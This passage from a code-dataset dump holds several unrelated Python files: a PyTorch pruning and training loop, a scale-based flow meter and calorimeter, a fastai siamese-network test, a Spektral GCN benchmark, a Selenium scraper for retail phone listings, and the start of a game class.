args.report_test_error_before_start:\n test_acc = basic_classification.evaluate(context, context.test_loader,no_grad=args.use_nograd)\n logging.info(\"INITIAL TEST ACCURACY:{}\".format(test_acc))\n print(\"INITIAL TEST ACCURACY:{}\".format(test_acc))\n\n if args.maintain_abs_deriv_sum:\n enable_grad_storage(context.model)\n\n \n best_eval_score=-float(\"inf\")\n for epoch_count in range(args.num_epochs):\n context.model.train()\n logging.info(\"Starting epoch \"+str(epoch_count) +\".\")\n if args.param_difs:\n param_tensors=genutil_modules.get_named_trainable_param_tensors(context.model)\n step=0\n epoch_start_time=time.time()\n for batch_in, *other in context.train_loader: \n categories = other[0]\n if context.data_type == DataType.SEQUENCE:\n pad_mat = other[1] \n step+=1\n\n context.optimizer.zero_grad()\n \n\n\n\n\n #for image classification, batch_in will have dimension batchsize by imagesize and scores will have dimension batchsize by number of categories\n #For sequence-to-sequence, batch_in will have dimension batchsize by the max sequence length in the batch. scores will have dimension batchsize by max sequence_length by categories\n\n scores= context.model(batch_in,pad_mat) if context.data_type == DataType.SEQUENCE else context.model(batch_in) #should have dimension batchsize by number of classes\n if args.born_again_enable:\n assert not args.multi_score_model\n grad_ctx = torch.no_grad() if args.use_no_grad else suppress() #separate name: assigning to 'context' here would shadow the training Context object used below; contextlib.suppress must be instantiated\n batch_in_v=batch_in.clone()\n batch_in_v.volatile=True\n with grad_ctx:\n previous_incarnation_scores = previous_incarnation_context.model(batch_in_v,pad_mat) if previous_incarnation_context.data_type == DataType.SEQUENCE else previous_incarnation_context.model(batch_in_v)\n\n\n #move categories to same device as scores\n if not args.multi_score_model and scores.is_cuda:\n categories=categories.cuda(scores.get_device())\n if args.multi_score_model and scores[0].is_cuda:\n categories=categories.cuda(scores[0].get_device())\n\n if args.classification_loss_type == \"cross_entropy\":\n if args.multi_score_model:\n assert args.squeezenet_use_forking\n if args.multi_score_unit_weighting:\n loss=0\n for branch_scores in scores:\n loss+=F.cross_entropy(branch_scores,categories)\n else:\n raise Exception(\"Not implemented!\")\n else:\n loss= F.cross_entropy(scores,categories) \n if args.born_again_enable:\n previous_incarnation_probs = F.softmax(previous_incarnation_scores,dim=1)\n previous_incarnation_divergence = F.kl_div(F.log_softmax(scores,dim=1), previous_incarnation_probs )\n loss+=previous_incarnation_divergence\n elif args.classification_loss_type == \"nll\":\n assert not args.born_again_enable\n assert not args.multi_score_model\n loss= F.nll_loss(scores,categories)\n elif args.classification_loss_type == \"square_hinge\": \n assert not args.born_again_enable\n assert not args.multi_score_model\n mult = Variable(categories.data.new(categories.shape[0], context.num_categories).fill_(0).float()) \n for i in range(categories.shape[0]):\n mult[i,categories[i]]=1\n mult = 2 * mult - 1 #one-hot targets mapped to +1/-1 for the hinge\n \n loss = torch.mean(torch.max( Variable(categories.data.new(1).fill_(0).float()), 1 - mult * scores ) ** 2)\n\n if args.enable_l0reg:\n lamb_param = None if (args.l0reg_lambda_vary_by_layer or args.l0reg_lambda_vary_by_sublayer_name) else args.l0reg_lambda\n loss += context.model.proxy_ctx.l0_loss(lamb_param) \n\n if args.enable_l1reg and ( (not args.disable_l1_reg_after_epoch) or epoch_count<= args.l1_reg_final_epoch ) :\n l1l = 
context.model.proxy_ctx.l1_loss_slimming(args.l1reg_lambda)\n accumulated_l1l+=float(l1l) #cast so the running total does not retain the autograd graph\n loss += l1l\n\n if args.enable_l2reg_stochastic:\n l2l_stochastic =context.model.proxy_ctx.l2_loss_stochastic(args.l2reg_stochastic_lambda) \n accumulated_l2l_stochastic+=float(l2l_stochastic)\n loss+=l2l_stochastic\n loss.backward()\n if args.maintain_abs_deriv_sum:\n update_abs_deriv_sum(context.model)\n\n\n\n if args.grad_norm_clip is not None:\n torch.nn.utils.clip_grad.clip_grad_norm(context.model.parameters(), args.grad_norm_clip)\n context.optimizer.step()\n \n if args.clamp_all_params:\n for param in context.model_parameters:\n param.data.clamp_(args.clamp_all_min,args.clamp_all_max)\n\n\n accumulated_loss+=float(loss)\n context.tb_writer.write_train_loss( float(loss) )\n if step % report_interval == 0:\n reporting.report(epoch_start_time,step,len(context.train_loader), accumulated_loss / report_interval)\n accumulated_loss = 0\n if args.enable_l1reg:\n logging.info(\"l1_loss:{}\".format(accumulated_l1l/report_interval))\n accumulated_l1l = 0\n if args.enable_l2reg_stochastic:\n logging.info(\"avg l2 stochastic loss:{}\".format(accumulated_l2l_stochastic/report_interval) )\n accumulated_l2l_stochastic = 0\n #added to try to clear the computation graph after every epoch\n del loss\n del scores\n context.model.eval()\n epoch_duration = time.time() - epoch_start_time\n context.tb_writer.write_data_per_second( context.train_size/epoch_duration)\n if args.param_difs:\n new_param_tensors=genutil_modules.get_named_trainable_param_tensors(context.model)\n context.tb_writer.write_param_change(new_param_tensors, param_tensors)\n param_tensors=new_param_tensors\n if args.maintain_abs_deriv_sum:\n disable_grad_storage(context.model)\n if epoch_count == 0 or epoch_count % args.eval_interval==0:\n logging.info(\"recalculating eval score\")\n eval_score=basic_classification.evaluate(context, context.val_loader,no_grad=args.use_nograd)\n if args.maintain_abs_deriv_sum:\n enable_grad_storage(context.model)\n\n context.tb_writer.write_accuracy(eval_score)\n logging.info(\"Finished epoch number \"+ str(epoch_count+1) + \" of \" +str(args.num_epochs)+\". 
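# --- Added sketch (proxy_ctx.l1_loss_slimming is internal to the candle library
# --- used in this repo): network slimming in the style of Liu et al. (2017)
# --- usually means an L1 penalty on BatchNorm scale factors, so that channels
# --- with small gamma can be pruned later. A generic version of that penalty:
import torch.nn as nn

def l1_slimming_penalty(model, lam):
    # sum of |gamma| over every BatchNorm2d scale parameter, times lambda
    penalty = 0.0
    for module in model.modules():
        if isinstance(module, nn.BatchNorm2d):
            penalty = penalty + module.weight.abs().sum()
    return lam * penalty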
Accuracy is \"+ str(eval_score) +\".\")\n if args.report_unpruned:\n n_unpruned = float(context.model.proxy_ctx.count_unpruned_masks())\n logging.info(\"Unpruned masks: \"+str(n_unpruned))\n context.tb_writer.write_unpruned_params(n_unpruned)\n if args.show_network_strucutre_every_epoch:\n logging.info(\"current model:\")\n logging.info(repr(context.model))\n if args.show_nonzero_masks_every_epoch:\n context.model.display_subblock_nonzero_masks(warning=False)\n \n if args.save_every_epoch:\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_most_recent\" ) )\n logging.info(\"saving most recent model\")\n \n\n if eval_score > best_eval_score:\n best_eval_score=eval_score\n logging.info(\"Saving model\")\n context.model.save(os.path.join(args.model_save_path,timestamp+\"recent_model\" ) )\n \n if args.lr_scheduler == \"epoch_anneal\":\n logging.info(\"saving as checkpoint\" + str(epoch_anneal_cur_cycle))\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_checkpoint_\" +str(epoch_anneal_cur_cycle) ) )\n else:\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_best_model\" ) )\n\n\n if context.scheduler is not None:\n if args.lr_scheduler == \"exponential\" or args.lr_scheduler == \"linear\" or args.lr_scheduler == \"multistep\":\n context.tb_writer.write_lr(context.scheduler.get_lr()[0] )\n context.scheduler.step()\n elif args.lr_scheduler == \"plateau\":\n # context.tb_writer.write_lr(next(context.optimizer.param_groups)['lr'] )\n context.scheduler.step(eval_score)\n elif args.lr_scheduler == \"epoch_anneal\":\n context.tb_writer.write_lr(context.scheduler.cur_lr() )\n context.scheduler.step()\n if context.scheduler.cur_step == context.scheduler.Tmax:\n logging.info(\"Hit min learning rate. 
Restarting learning rate annealing.\")\n context.scheduler.cur_step = -1\n context.scheduler.step()\n best_eval_score= -float(\"inf\")\n if args.epoch_anneal_save_last:\n context.model.save(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_endofcycle_checkpoint_\" +str(epoch_anneal_cur_cycle) ) )\n if args.epoch_anneal_mult_factor != 1:\n logging.info(\"Multiplying anneal duration by \"+str(args.epoch_anneal_mult_factor))\n context.scheduler.Tmax*=args.epoch_anneal_mult_factor \n logging.info(\"anneal duration currently:\"+str(context.scheduler.Tmax))\n if args.epoch_anneal_update_previous_incarnation:\n if args.epoch_anneal_start_ba_after_epoch and epoch_anneal_cur_cycle == 0:\n args.born_again_enable=True\n previous_incarnation_context=make_context(args)\n\n assert(args.epoch_anneal_save_last)\n logging.info(\"loading previous incarnation\")\n previous_incarnation_context.model.load(os.path.join(args.model_save_path,timestamp+args.save_prefix +\"_endofcycle_checkpoint_\" +str(epoch_anneal_cur_cycle) ) )\n for param in previous_incarnation_context.model.parameters():\n param.requires_grad = False\n if args.epoch_anneal_reinit_after_cycle:\n logging.info(\"resenting parameters of current model\")\n context.model.init_params()\n \n epoch_anneal_cur_cycle+=1\n \n else:\n raise Exception(\"Unknown Scheduler\")\n\n if args.count_multiplies_every_cycle:\n if args.count_mult_override_img_dims:\n img_h = args.count_mult_override_imgh\n img_w = args.count_mult_override_imgw\n channels=3\n else:\n img_h, img_w, channels=get_dims_from_dataset(args.dataset_for_classification)\n mults = countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels)\n logging.info(\"Approx number of multiplies: \"+str(mults) ) \n context.tb_writer.write_multiplies(mults)\n\n if args.weight_reset_enable and epoch_count == args.weight_reset_epoch_num :\n context.model.reset_weights()\n \n if args.print_params_after_epoch:\n logging.info(\"model_params:\")\n for param in context.model.proxy_ctx.list_model_params():\n logging.info(str(param)) \n logging.info(\"mask_params\")\n for param in context.model.proxy_ctx.list_mask_params():\n logging.info(str(param))\n if args.enable_pruning: \n assert(args.report_unpruned)\n if args.group_prune_strategy == \"taylor\":\n assert args.maintain_abs_deriv_sum \n if epoch_count >= args.prune_warmup_epochs and epoch_count % args.prune_epoch_freq==0 and n_unpruned> prune_target:\n logging.info(\"pruning...\")\n prunefunc = get_pruning_func(context, args)\n if args.prune_calc_type ==\"relative\":\n pu = prune_unit\n elif args.prune_calc_type ==\"absolute\":\n pu=prune_abs_unit\n\n prunefunc(pu)\n if n_unpruned <=prune_target and args.terminate_after_pruning:\n iter_after_pruning+=1\n if iter_after_pruning > args.iterations_after_pruning:\n break\n\n\n if args.group_prune_strategy == \"taylor\" and args.maintain_abs_deriv_sum :\n clear_abs_deriv_sum(context.model)\n clear_record_of_output(context.model) #neccesary because evaluating the model may have caused additional output to be stored\n\n\n if args.do_condense and epoch_count >= args.condense_warmup and (epoch_count-args.condense_warmup) % args.condense_interval == 0 and conds_so_far= num_samples-1:\n break\n context.model.proxy_ctx.hz_lasso_prune(sb_real, target_num_channels=None,target_prop=target_prop, sample_inputs=sb_real.record_of_input, sample_outputs=sb_copy.record_of_output, solve_for_weights=solve_for_weights)\n sb_real.store_input=False\n sb_copy.store_output=False\n\n 
sb_real.record_of_input=[]\n sb_copy.record_of_output=[]\n\ndef recalc_weights_pruned(context, args, num_samples, loader,model_copy):\n context.model.eval()\n logging.info(\"re-calculating weights\")\n subblocks = context.model.to_subblocks()\n subblocks_copy = model_copy.to_subblocks()\n from tqdm import tqdm\n sb_loader =tqdm(subblocks.keys())\n for sb_name in sb_loader:\n sb_real = subblocks[sb_name]\n sb_copy = subblocks_copy[sb_name]\n if not isinstance(sb_real, candle.proxy.ProxyConv2d):\n continue\n logging.info(\"pruning {}\".format(sb_name))\n sb_real.store_input= True\n sb_copy.store_output = True\n for i,(batch_in, *other) in enumerate(loader): \n with torch.no_grad():\n context.model(batch_in)\n model_copy(batch_in)\n if i >= num_samples-1:\n break\n context.model.proxy_ctx.recalc_weights_pruned_layer(sb_real,Atensor=torch.cat(sb_real.record_of_input,dim=0), Ytensor=torch.cat(sb_copy.record_of_output,dim=0))\n sb_real.store_input=False\n sb_copy.store_output=False\n\n sb_real.record_of_input=[]\n sb_copy.record_of_output=[]\n context.model.train()\n\n\n\n\n\n\ndef enable_grad_storage(model):\n subblocks = model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=True\n layer.store_output_grad=True\n\ndef disable_grad_storage(model):\n subblocks = model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=False\n layer.store_output_grad=False\n\n\n\n\ndef update_abs_deriv_sum(model):\n subblocks = model.to_subblocks()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.update_abs_deriv_sum()\n\ndef clear_abs_deriv_sum(model):\n subblocks = model.to_subblocks()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.record_of_abs_deriv_sum=0\n\ndef clear_record_of_output(model):\n subblocks = model.to_subblocks()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.record_of_output=[]\n\n\n\n\ndef taylor_sample_batches(context, args):\n #note: this function may change a model slightly by changing its batch norm running averages\n assert args.group_prune_strategy == \"taylor\" \n context.model.eval()\n loader=context.val_loader #using a subset of the train set will cause randomness because the train set is shuffled\n subblocks = context.model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=True\n layer.store_output_grad=True\n for i, (batch_in,*other) in enumerate(loader):\n categories = other[0]\n scores = context.model(batch_in)\n loss= F.cross_entropy(scores,categories) \n loss.backward()\n for _, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.update_abs_deriv_sum()\n\n context.optimizer.zero_grad()\n #if i >= args.taylor_num_samples -1:\n # break\n context.model.train()\n \n \n\ndef taylor_sample_clear(context,args):\n subblocks = context.model.to_subblocks()\n for name, layer in subblocks.items():\n if not isinstance(layer, candle.proxy.ProxyConv2d):\n continue\n layer.store_output=False\n layer.record_of_output=[]\n 
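# --- Added sketch: update_abs_deriv_sum and the stored outputs/gradients in the
# --- helpers above belong to the internal candle proxy layers. The Taylor
# --- pruning criterion they support (Molchanov et al., 2017) ranks a channel by
# --- the accumulated magnitude of activation * gradient; roughly:
import torch

def taylor_channel_scores(outputs, output_grads):
    # outputs / output_grads: matched lists of (N, C, H, W) tensors captured
    # during forward/backward passes over sampled batches
    scores = 0.0
    for out, grad in zip(outputs, output_grads):
        # first-order Taylor term per channel, averaged over batch and space
        scores = scores + (out * grad).abs().mean(dim=(0, 2, 3))
    return scores / len(outputs)  # one importance score per channel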
layer.record_of_output_grad=[]\n\n","sub_path":"examples/lab/basic_classify.py","file_name":"basic_classify.py","file_ext":"py","file_size_in_byte":61245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"392501359","text":"__author__ = 'Brian Albiston'\nimport sys, datetime, time\nimport numpy as np\nimport math\nimport traceback\n\n\"\"\"\n Class to use a scale as a flow meter\n\"\"\"\nclass scaleFlowMeter(object):\n \"\"\"\n Initialize \n \"\"\"\n def __init__(self,samples):\n #\n self.start_time = time.time()\n self.delta_grams = 0\n self.current_grams = 0\n self.current_sample_time = time.time()\n self.delta_time = time.time() - self.start_time\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n self.flowLPM = 0\n self.filling = 0\n self.mass_vector = []\n self.time_vector = []\n\n # Settings from GUI\n self.samples = samples\n\n \"\"\"\n Start Scale Flow Calculation \n \"\"\"\n def start(self, grams, time):\n try:\n # Initialize Variables\n # self.start_time = time.time()\n self.start_time = time\n self.current_grams = grams\n self.mass_vector.append(self.current_grams)\n self.time_vector.append(self.start_time)\n\n except Exception as err:\n print(\"Scale flow update Error, {}\".format(datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n pass\n\n \"\"\"\n Update Scale Flow Running Average\n \"\"\"\n def update(self, grams, time):\n try:\n self.current_grams = grams\n self.current_sample_time = time\n\n # Append last read counter count\n self.mass_vector.append(self.current_grams)\n # self.time_vector.append(time.time())\n self.time_vector.append(self.current_sample_time)\n\n # Running Average\n # If vectors are still filling don't delete last value\n if len(self.mass_vector) < self.samples:\n self.delta_grams = self.mass_vector[-1] - \\\n self.mass_vector[0] # Negative index is last element\n self.delta_time = self.time_vector[-1] - self.time_vector[0]\n\n # If vectors are too long\n elif len(self.mass_vector) > self.samples:\n # Slice off extra values\n self.mass_vector = self.mass_vector[len(self.mass_vector) - self.samples:]\n self.time_vector = self.time_vector[len(self.time_vector) - self.samples:]\n self.delta_grams = self.mass_vector[-1] - \\\n self.mass_vector.pop(0) # pop returns and removes last item\n self.delta_time = self.time_vector[-1] - self.time_vector.pop(0)\n\n # Vectors just right, read and remove last value\n else:\n self.delta_grams = self.mass_vector[-1] - self.mass_vector.pop(0)\n self.delta_time = self.time_vector[-1] - self.time_vector.pop(0)\n\n # Find Average Flow Rate\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n if self.seconds > 0:\n # Flow in liters/min = Delta grams * (1 liter / 1000 grams) / Delta seconds * (60 seconds/ 1 min)\n # self.flowLPM = (self.delta_grams / 1000) * (60 / self.delta_time);\n self.flowLPM = (self.delta_grams / 1000) * (60 / self.seconds);\n else:\n self.flowLPM = 0\n\n except Exception as err:\n print(\"Flow Calorimeter scaleFlowMeter Update Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n pass\n\n\"\"\"\nWater Flow Calorimeter\n\"\"\"\nclass flowCalorimeter(object):\n def __init__(self,samples,specific_heat=4.184):\n # Initialize Calorimeter Parameters\n self.cp = specific_heat\n self.running = 0\n # self.start_time = 
time.time()\n self.start_wh = 0\n self.delta_wh = 0\n self.current_wh = 0\n self.last_time = time.time()\n self.delta_time = time.time()\n self.current_time = time.time()\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n self.flowLPM = 0\n self.filling = 0\n self.temperature_in = 0\n self.temperature_out = 0\n self.watts_in = 0\n self.cop = 1\n self.cop_avg = 1\n self.flowGramsPerSec = 0\n self.watts_out = 0\n self.in_joules_total = 0\n self.out_joules_total = 0\n self.excess_MJ = 0\n self.cop_vector = []\n self.time_vector = []\n\n # Settings from GUI\n self.samples = samples\n\n \"\"\"\n Start Calorimeter \n \"\"\"\n def start(self,wh_in):\n try:\n # set running flag\n self.running = 1\n self.last_time = time.time()\n self.start_wh = wh_in\n\n self.start_time = time.time()\n self.cop_vector.append(self.cop)\n self.time_vector.append(self.start_time)\n\n except Exception as err:\n self.running = 0\n print(\"Calorimeter Start Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n e = sys.exc_info()[0]\n print(\"Calorimeter Start Error: %s\" % e)\n pass\n\n \"\"\"\n Update Calorimeter \n \"\"\"\n def update(self,temperature_in,temperature_out,flowLPM,watts_in,wh_in,filling=0):\n try:\n self.flowLPM = flowLPM\n self.filling = filling\n self.temperature_in = temperature_in\n self.temperature_out = temperature_out\n self.watts_in = watts_in\n self.current_wh = wh_in\n\n \"\"\"\n COP Calculation\n \"\"\"\n # Find flow in grams/sec = flow liters/min * 1000g/1liter * 1 min/60sec\n self.flowGramsPerSec = self.flowLPM * 1000 / 60\n\n # Power out = 4.184 * flow_rate * (T_out - T_in) flow_rate in grams/sec\n self.watts_out = self.cp * self.flowGramsPerSec * (self.temperature_out - self.temperature_in)\n\n # Find COP\n if (self.watts_in > 0) and (self.filling == 1):\n self.cop = self.watts_out/self.watts_in\n else:\n self.cop = 1\n\n \"\"\"\n Excess Energy Calculation\n \"\"\"\n # Find deltas since start of cycle\n self.delta_wh = self.current_wh - self.start_wh\n\n # Find deltas since last update\n self.current_time = time.time()\n self.delta_time = self.current_time - self.last_time\n self.delta_seconds = datetime.timedelta(seconds=self.delta_time)\n self.seconds = self.delta_seconds.total_seconds()\n\n # Set time for next iteration\n self.last_time = self.current_time\n\n # Find total joules in\n # 1 Watt-hr = 3600 J\n self.in_joules_total = self.delta_wh * 3600\n\n # Find total joules out\n self.out_joules_total = self.out_joules_total + self.watts_out * self.seconds\n\n # Find Excess MJ\n self.excess_MJ = (self.out_joules_total - self.in_joules_total)/1000000\n\n # Find COP Running Average\n # Append last cop\n self.cop_vector.append(self.cop)\n\n # Running Average\n # If vectors are still filling don't delete last value\n if len(self.cop_vector) < self.samples:\n self.cop_avg = np.average(self.cop_vector) # Negative index is last element\n\n # Vector is long enough\n else:\n # Slice off extra values\n self.cop_vector = self.cop_vector[len(self.cop_vector) - self.samples:]\n\n # Calculate Average\n self.cop_avg = np.average(self.cop_vector)\n\n except Exception as err:\n print(\"Calorimeter Update Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n e = sys.exc_info()[0]\n print(\"Calorimeter Update Error: %s\" % e)\n pass\n\n \"\"\"\n Reset Calorimeter\n \"\"\"\n def reset(self):\n try:\n self.start_wh = 
self.current_wh\n self.out_joules_total = 0\n\n except Exception as err:\n print(\"Calorimeter Reset Error, {}\".format(\n datetime.datetime.now().strftime(\"%d %H:%M:%S\")))\n traceback.print_tb(err.__traceback__)\n e = sys.exc_info()[0]\n print(\"Calorimeter Reset Error: %s\" % e)\n pass","sub_path":"mfmp_flow_calorimeter.py","file_name":"mfmp_flow_calorimeter.py","file_ext":"py","file_size_in_byte":8764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"172449178","text":"from siameseimage import *\n\nbase_path = Path('../src')\n\nimg_train = base_path / 'train_images'\n\ndf = pd.read_csv(base_path / 'train.csv')\n\n## Prepare Data ##\n## Remove duplicates\ndf.drop_duplicates(['image_phash'], inplace = True)\n\n## Make shure that for each label, there are at least 2 unique images.\ndf_groupby_label = df.groupby(['label_group'])['image_phash'].nunique().to_frame()\nkeep_labels = df_groupby_label[df_groupby_label.image_phash >= 2].index.tolist()\ndf = df[df['label_group'].isin(keep_labels)].reset_index(drop = True)\ndf.drop(['title'], axis = 1, inplace = True)\n\n## Decrease size of dataframe for testing purposes.\npct = 0.1\n\nlabels = df['label_group'].unique()\n## Sample given percentage from the labels\nkeep_labels = np.random.choice(labels, size = int(len(labels)*pct), replace = False)\n## Restrict dataframe to instances that are in chosen labels\ndf = df[df['label_group'].isin(keep_labels)]\ndf = df.reset_index(drop = True)\n\ndf = split_df(df, label_col = 'label_group', verbose = False)\n\n#print('Head of the dataframe:')\n#print(df.head())\n\ntfm = SiameseTransform(df, path = img_train, f_col = 'image', label_col = 'label_group', val_col = 'is_valid')\n\ntls = TfmdLists(range(df.shape[0]), tfm, splits = tfm.splits)\n\nsize = 224\nbs = 32\ndls = tls.dataloaders(after_item=[Resize(size), ToTensor], \n after_batch=[IntToFloatTensor, Normalize.from_stats(*imagenet_stats)],\n bs = bs\n )\n\narc = resnet34\ncut = model_meta[arc]['cut']\nencoder = create_body(arc, cut = cut)\nhead = create_head(512 * 2, 2, ps=0.5)\nmodel = SiameseModel(encoder, head)\n\nlearn = Learner(dls, model, loss_func = CrossEntropyLossFlat(), splitter = siamese_splitter, metrics = accuracy).to_fp16()\nlearn.freeze()\nlearn.fine_tune(3)\n","sub_path":"siameseimage/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121365782","text":"\"\"\"\nThis script is a proof of concept to train GCN as fast as possible and with as\nlittle lines of code as possible.\nIt uses a custom training function instead of the standard Keras fit(), and\ncan train GCN for 200 epochs in a few tenths of a second (~0.20 on a GTX 1050).\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Dropout\nfrom tensorflow.keras.losses import CategoricalCrossentropy\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.regularizers import l2\n\nfrom spektral.datasets.citation import Cora\nfrom spektral.layers import GCNConv\nfrom spektral.transforms import LayerPreprocess, AdjToSpTensor\nfrom spektral.utils import tic, toc\n\n# Load data\ndataset = Cora(transforms=[LayerPreprocess(GCNConv), AdjToSpTensor()])\ngraph = dataset[0]\nx, a, y = graph.x, graph.a, graph.y\nmask_tr, mask_va, mask_te = dataset.mask_tr, dataset.mask_va, dataset.mask_te\n\n# Define model\nx_in = 
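# --- Added sketch for the Spektral GCN example in this record (not part of the
# --- original script; assumes the names model, x, a, y, mask_te and the
# --- tensorflow import defined there): once training has been timed, test
# --- accuracy can be read off with the same boolean-mask pattern as the loss.
@tf.function
def evaluate():
    predictions = model([x, a], training=False)
    correct = tf.equal(tf.argmax(predictions[mask_te], axis=1),
                       tf.argmax(y[mask_te], axis=1))
    return tf.reduce_mean(tf.cast(correct, tf.float32))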
Input(shape=(dataset.n_node_features,))\na_in = Input((dataset.n_nodes,), sparse=True)\nx_1 = GCNConv(16, 'relu', True, kernel_regularizer=l2(5e-4))([x_in, a_in])\nx_1 = Dropout(0.5)(x_1)\nx_2 = GCNConv(y.shape[1], 'softmax', True)([x_1, a_in])\n\n# Build model\nmodel = Model(inputs=[x_in, a_in], outputs=x_2)\noptimizer = Adam(lr=1e-2)\nloss_fn = CategoricalCrossentropy()\n\n\n# Training step\n@tf.function\ndef train():\n with tf.GradientTape() as tape:\n predictions = model([x, a], training=True)\n loss = loss_fn(y[mask_tr], predictions[mask_tr])\n loss += sum(model.losses)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return loss\n\n\n# Time the execution of 200 epochs of training\ntrain() # Warm up to ignore tracing times when timing\ntic()\nfor epoch in range(1, 201):\n train()\ntoc('Spektral - GCN (200 epochs)')\n","sub_path":"examples/node_prediction/citation_gcn_custom.py","file_name":"citation_gcn_custom.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137526133","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver import ActionChains\nimport time\nimport re\nimport numpy as np\nimport string\nimport unidecode\n\n\n\nPATH = \"E:\\Selenium\\Introduction_To_Data_Science\\chromedriver.exe\"\n\ndriver = webdriver.Chrome(PATH)\nurls = [\n 'https://www.dienmayxanh.com/dien-thoai?g=dien-thoai-pho-thong&page=0#g:62879',\n 'https://www.dienmayxanh.com/dien-thoai?g=iphone-ios&page=0#g:39238',\n 'https://www.dienmayxanh.com/dien-thoai?g=android#g:39237'\n]\ndef clean_string(string): \n string = string.replace('\\n',' ')\n string = string.replace(',',' ')\n string = string.rstrip()\n string_without_newline = \"\"\n for c in string:\n if c.isalpha() or c.isdigit() or c == ' ':\n string_without_newline += c\n return string_without_newline\n\ndef get_infor():\n #.text is a property on WebElement, not a method\n name = driver.find_element_by_css_selector('h1').text\n price = driver.find_element_by_css_selector('.displayp').text\n number_of_comment = driver.find_element_by_class_name('tltRt').text #find_element_by_class_name takes the bare class name, no leading dot\n number_of_comment = re.findall('[0-9]+',number_of_comment)\n #expands the full specification table; arr is a placeholder for spec rows that are not collected yet\n description = driver.execute_script('''\n let arr = [];\n document.querySelector('.viewparameterfull').click();\n return arr;\n ''')\n return {'name': name, 'price': price, 'comments': number_of_comment, 'description': description}\n\nfor url in urls:\n driver.get(url)\n driver.execute_script('''\n \n x = document.querySelector('.loadmore');\n while ( x != null){\n x.click();\n x = document.querySelector('.loadmore');\n }\n \n ''')\n products = driver.find_elements_by_class_name('prdItemGetDelStt')\n #grab the hrefs first: the elements go stale once the driver navigates away\n links = [product.get_attribute(\"href\") for product in products]\n for link in links:\n driver.get(link)\n infos = get_infor()\n print(len(links))\n time.sleep(1.5)\n \n\n","sub_path":"dienmayxanh/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174858261","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom Pieces import *\nfrom Logger import Logger\nimport json\n\nclass Game:\n\n #\n # DONE\n # Initialize the game\n # Args: None\n # Returns: None\n #\n def __init__(self):\n self.ready = False\n self.players = 0\n self.board = []\n self.playerTurn = 0\n self.initBoard()\n\n #\n # DONE\n # 
